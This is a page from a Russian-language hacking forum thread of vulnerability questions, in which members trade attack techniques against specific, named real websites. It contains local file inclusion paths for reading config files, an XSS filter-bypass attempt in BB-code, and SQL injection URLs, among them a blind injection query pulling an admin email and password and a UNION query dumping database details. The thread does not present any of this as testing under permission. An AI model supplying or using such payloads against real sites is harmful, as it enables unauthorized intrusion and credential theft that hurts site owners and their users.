Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5

    Ну вижу срезалось!

    И что мне теперь с этим делать???
     
  2. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    На счёт доступа к БД через локальный инклуд, я хз, ниразу не слышал...
    А вот почитать файлы на сервере можно, остаётся узнать, на сколько дирикторий ниже находится нужный нам файл. Вместо символа "<"(0x3C) используй "."(0x2E) для того, чтобы иметь возможность выйти из текущей директории.
     
    2 people like this.
  3. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    во первых
    сервер виндовый о чем явственно гласит надпись "in Y:\home\78.110.144.12\www\index.php"
    значит никакого /etc/passwd

    во-вторых
    замена нулл-байта для винды - 255 точек(если пямять не изменяет)

    upd: 266 ,пардон ,точек. более универсальная весч.
     
    #6963 geezer.code, 7 May 2009
    Last edited: 7 May 2009
    1 person likes this.
  4. de0n1k

    de0n1k New Member

    Joined:
    18 Jul 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Помогите обойти фильтр! Не выводится алерт!

    [im*g]http://www.qwewqw.ru/1.jpg%20dynsrc=javascript:alert()[/im*g]
     
  5. 25:17

    25:17 Banned

    Joined:
    7 May 2009
    Messages:
    9
    Likes Received:
    3
    Reputations:
    0
    а как он обрабатывает этот ББ-код в ХТМЛ? кинь исходник странички в этом месте
     
  6. de0n1k

    de0n1k New Member

    Joined:
    18 Jul 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Code:
    <img src="http://www.qwewqw.ru/1.jpg%20dynsrc=javascript:alert()" alt="Изображение" />
     
  7. 25:17

    25:17 Banned

    Joined:
    7 May 2009
    Messages:
    9
    Likes Received:
    3
    Reputations:
    0
    Попробуй
    [im*g]http://www.qwewqw.ru/1.jpg" dynsrc="javascript:alert()[/im*g]
     
  8. de0n1k

    de0n1k New Member

    Joined:
    18 Jul 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Code:
    <img src="http://www.qwewqw.ru/1.jpg&quot;%20dynsrc=&quot;javascript:alert()" alt="Изображение" />
     
  9. 25:17

    25:17 Banned

    Joined:
    7 May 2009
    Messages:
    9
    Likes Received:
    3
    Reputations:
    0
    тогда у тебя не получится, там фильтруется двойная ковычка, а без неё тебе там ничего не сделать.
     
  10. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    НУ ПОМОГИ ТОГДА!

    По подробнее можешь расписать???
     
  11. AET

    AET New Member

    Joined:
    17 Mar 2008
    Messages:
    23
    Likes Received:
    1
    Reputations:
    -2
    зачем тебе это а там ведь инклуда. инклуду уже во многих саитах зашешают только не опотныие програмисты могут сделать такое. помоему ты хочеш узнать что можно сделать с таким ошибкой я тоже хотел бы узнать что можно сделать если наити на саитах такие инклуд ошибки и к чему они приведут если оно попоидет в руку хакера
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://wow.alania.net/index.php?page=../index
    http://wow.alania.net/?page=../config
    
     
    #6972 Pashkela, 8 May 2009
    Last edited: 8 May 2009
    1 person likes this.
  13. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.ncrtp-hepc.ca/profiles.php?id=70
    SQL-Inj. Help...

    geforce, не пиши красным =\
    Code:
    http://www.google.com/search?client=opera&rls=en&q=site:forum.antichat.ru+wow.alania.net
     
    #6973 mailbrush, 8 May 2009
    Last edited: 8 May 2009
  14. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    2mailbrush
    Там одно поле:

    Code:
    http://www.ncrtp-hepc.ca/profiles.php?id=70+order+by+1--+
    И четвёртая ветка:

    Code:
    http://www.ncrtp-hepc.ca/profiles.php?id=70+and+substring(version(),1,1)=4--

    Но вывода скорее всего нету, но это не ознаает, что его и не будет, гдето здесь присалось об этом:

    Если ничего не выйдет, то работай подзапросами!
     
    #6974 bug1z, 8 May 2009
    Last edited: 8 May 2009
    1 person likes this.
  15. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.ncrtp-hepc.ca/profiles.php?id=70+and+ascii(substring((select+concat_ws(0x2F,email,pwd)+from+admin+limit+0,1),1,1))>1
     
    1 person likes this.
  16. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    Там только одно поле и нету вывода. Заюзай эту лучше:
    http://www.ncrtp-hepc.ca/profiles.php?type=-3+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7/*

    ps: Тут еще прикольный листинг директорий есть, может пригодится: http://www.ncrtp-hepc.ca/photos.php?album=../
     
    1 person likes this.
  17. crazy~driver

    crazy~driver Member

    Joined:
    21 Dec 2008
    Messages:
    97
    Likes Received:
    14
    Reputations:
    4
    у меня такой вопрос
    как если есть листинг дирректории просмотреть код php файла
     
  18. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 crazy~driver
    Не посмотришь, т.к. php интерпретируется на стороне сервера, независимо от включенного\выключенного листинга директорий
     
  19. crazy~driver

    crazy~driver Member

    Joined:
    21 Dec 2008
    Messages:
    97
    Likes Received:
    14
    Reputations:
    4
    ясненько жаль конечно bak как назло нет
    спс iceangel
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.unipi.it/php/corsilaureaing/dett_corso.php?id=217+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
    PostgreSQL - первый раз с такой стыкаюсь. Почитал статтейку, вроде понял, но не пашет (не выводится).
     
    #6980 mailbrush, 9 May 2009
    Last edited: 9 May 2009
Thread Status:
Not open for further replies.